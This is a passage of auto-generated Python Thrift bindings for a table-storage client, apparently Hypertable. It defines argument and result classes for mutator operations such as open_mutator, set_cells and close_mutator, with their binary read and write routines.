(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
(4, TType.LIST, 'cell', (TType.STRING,None), None, ), # 4
)
def __init__(self, ns=None, table_name=None, mutate_spec=None, cell=None,):
self.ns = ns
self.table_name = table_name
self.mutate_spec = mutate_spec
self.cell = cell
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.mutate_spec = MutateSpec()
self.mutate_spec.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.LIST:
self.cell = []
(_etype154, _size151) = iprot.readListBegin()
for _i155 in xrange(_size151):
_elem156 = iprot.readString();
self.cell.append(_elem156)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cell_as_array_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.mutate_spec != None:
oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
self.mutate_spec.write(oprot)
oprot.writeFieldEnd()
if self.cell != None:
oprot.writeFieldBegin('cell', TType.LIST, 4)
oprot.writeListBegin(TType.STRING, len(self.cell))
for iter157 in self.cell:
oprot.writeString(iter157)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cell_as_array_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cell_as_array_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class open_mutator_args:
"""
Attributes:
- ns
- table_name
- flags
- flush_interval
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.I32, 'flags', None, 0, ), # 3
(4, TType.I32, 'flush_interval', None, 0, ), # 4
)
def __init__(self, ns=None, table_name=None, flags=thrift_spec[3][4], flush_interval=thrift_spec[4][4],):
self.ns = ns
self.table_name = table_name
self.flags = flags
self.flush_interval = flush_interval
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.flags = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.flush_interval = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('open_mutator_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.flags != None:
oprot.writeFieldBegin('flags', TType.I32, 3)
oprot.writeI32(self.flags)
oprot.writeFieldEnd()
if self.flush_interval != None:
oprot.writeFieldBegin('flush_interval', TType.I32, 4)
oprot.writeI32(self.flush_interval)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class open_mutator_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('open_mutator_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class close_mutator_args:
"""
Attributes:
- mutator
- flush
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'mutator', None, None, ), # 1
(2, TType.BOOL, 'flush', None, True, ), # 2
)
def __init__(self, mutator=None, flush=thrift_spec[2][4],):
self.mutator = mutator
self.flush = flush
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.mutator = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BOOL:
self.flush = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('close_mutator_args')
if self.mutator != None:
oprot.writeFieldBegin('mutator', TType.I64, 1)
oprot.writeI64(self.mutator)
oprot.writeFieldEnd()
if self.flush != None:
oprot.writeFieldBegin('flush', TType.BOOL, 2)
oprot.writeBool(self.flush)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class close_mutator_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('close_mutator_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cell_args:
"""
Attributes:
- mutator
- cell
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'mutator', None, None, ), # 1
(2, TType.STRUCT, 'cell', (Cell, Cell.thrift_spec), None, ), # 2
)
def __init__(self, mutator=None, cell=None,):
self.mutator = mutator
self.cell = cell
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.mutator = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.cell = Cell()
self.cell.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cell_args')
if self.mutator != None:
oprot.writeFieldBegin('mutator', TType.I64, 1)
oprot.writeI64(self.mutator)
oprot.writeFieldEnd()
if self.cell != None:
oprot.writeFieldBegin('cell', TType.STRUCT, 2)
self.cell.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cell_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cell_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cell_as_array_args:
"""
Attributes:
- mutator
- cell
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'mutator', None, None, ), # 1
(2, TType.LIST, 'cell', (TType.STRING,None), None, ), # 2
)
def __init__(self, mutator=None, cell=None,):
self.mutator = mutator
self.cell = cell
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.mutator = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.cell = []
(_etype161, _size158) = iprot.readListBegin()
for _i162 in xrange(_size158):
_elem163 = iprot.readString();
self.cell.append(_elem163)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cell_as_array_args')
if self.mutator != None:
oprot.writeFieldBegin('mutator', TType.I64, 1)
oprot.writeI64(self.mutator)
oprot.writeFieldEnd()
if self.cell != None:
oprot.writeFieldBegin('cell', TType.LIST, 2)
oprot.writeListBegin(TType.STRING, len(self.cell))
for iter164 in self.cell:
oprot.writeString(iter164)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cell_as_array_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cell_as_array_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cells_args:
"""
Attributes:
- mutator
- cells
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'mutator', None, None, ), # 1
(2, TType.LIST, 'cells', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 2
)
def __init__(self, mutator=None, cells=None,):
self.mutator = mutator
self.cells = cells
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.mutator = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.cells = []
(_etype168, _size165) = iprot.readListBegin()
for _i169 in xrange(_size165):
_elem170 = Cell()
_elem170.read(iprot)
self.cells.append(_elem170)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cells_args')
if self.mutator != None:
oprot.writeFieldBegin('mutator', TType.I64, 1)
oprot.writeI64(self.mutator)
oprot.writeFieldEnd()
if self.cells != None:
oprot.writeFieldBegin('cells', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.cells))
for iter171 in self.cells:
iter171.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cells_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cells_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cells_as_arrays_args:
"""
Attributes:
- mutator
- cells
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'mutator', None, None, ), # 1
(2, TType.LIST, 'cells', (TType.LIST,(TType.STRING,None)), None, ), # 2
)
def __init__(self, mutator=None, cells=None,):
self.mutator = mutator
self.cells = cells
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.mutator = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.cells = []
(_etype175, _size172) = iprot.readListBegin()
for _i176 in xrange(_size172):
_elem177 = []
(_etype181, _size178) = iprot.readListBegin()
for _i182 in xrange(_size178):
_elem183 = iprot.readString();
_elem177.append(_elem183)
iprot.readListEnd()
self.cells.append(_elem177)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cells_as_arrays_args')
if self.mutator != None:
oprot.writeFieldBegin('mutator', TType.I64, 1)
oprot.writeI64(self.mutator)
oprot.writeFieldEnd()
if self.cells != None:
oprot.writeFieldBegin('cells', TType.LIST, 2)
oprot.writeListBegin(TType.LIST, len(self.cells))
for iter184 in self.cells:
oprot.writeListBegin(TType.STRING, len(iter184))
for iter185 in iter184:
oprot.writeString(iter185)
oprot.writeListEnd()
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cells_as_arrays_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cells_as_arrays_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cells_serialized_args:
"""
Attributes:
- mutator
- cells
- flush
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'mutator', None, None, ), # 1
(2, TType.STRING, 'cells', None, None, ), # 2
(3, TType.BOOL, 'flush', None, False, ), # 3
)
def __init__(self, mutator=None, cells=None, flush=thrift_spec[3][4],):
self.mutator = mutator
self.cells = cells
self.flush = flush
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.mutator = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.cells = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.BOOL:
self.flush = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cells_serialized_args')
if self.mutator != None:
oprot.writeFieldBegin('mutator', TType.I64, 1)
oprot.writeI64(self.mutator)
oprot.writeFieldEnd()
if self.cells != None:
oprot.writeFieldBegin('cells', TType.STRING, 2)
oprot.writeString(self.cells)
oprot.writeFieldEnd()
if self.flush != None:
oprot.writeFieldBegin('flush', TType.BOOL, 3)
oprot.writeBool(self.flush)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class set_cells_serialized_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('set_cells_serialized_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class flush_mutator_args:
"""
Attributes:
- mutator
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'mutator', None, None, ), # 1
)
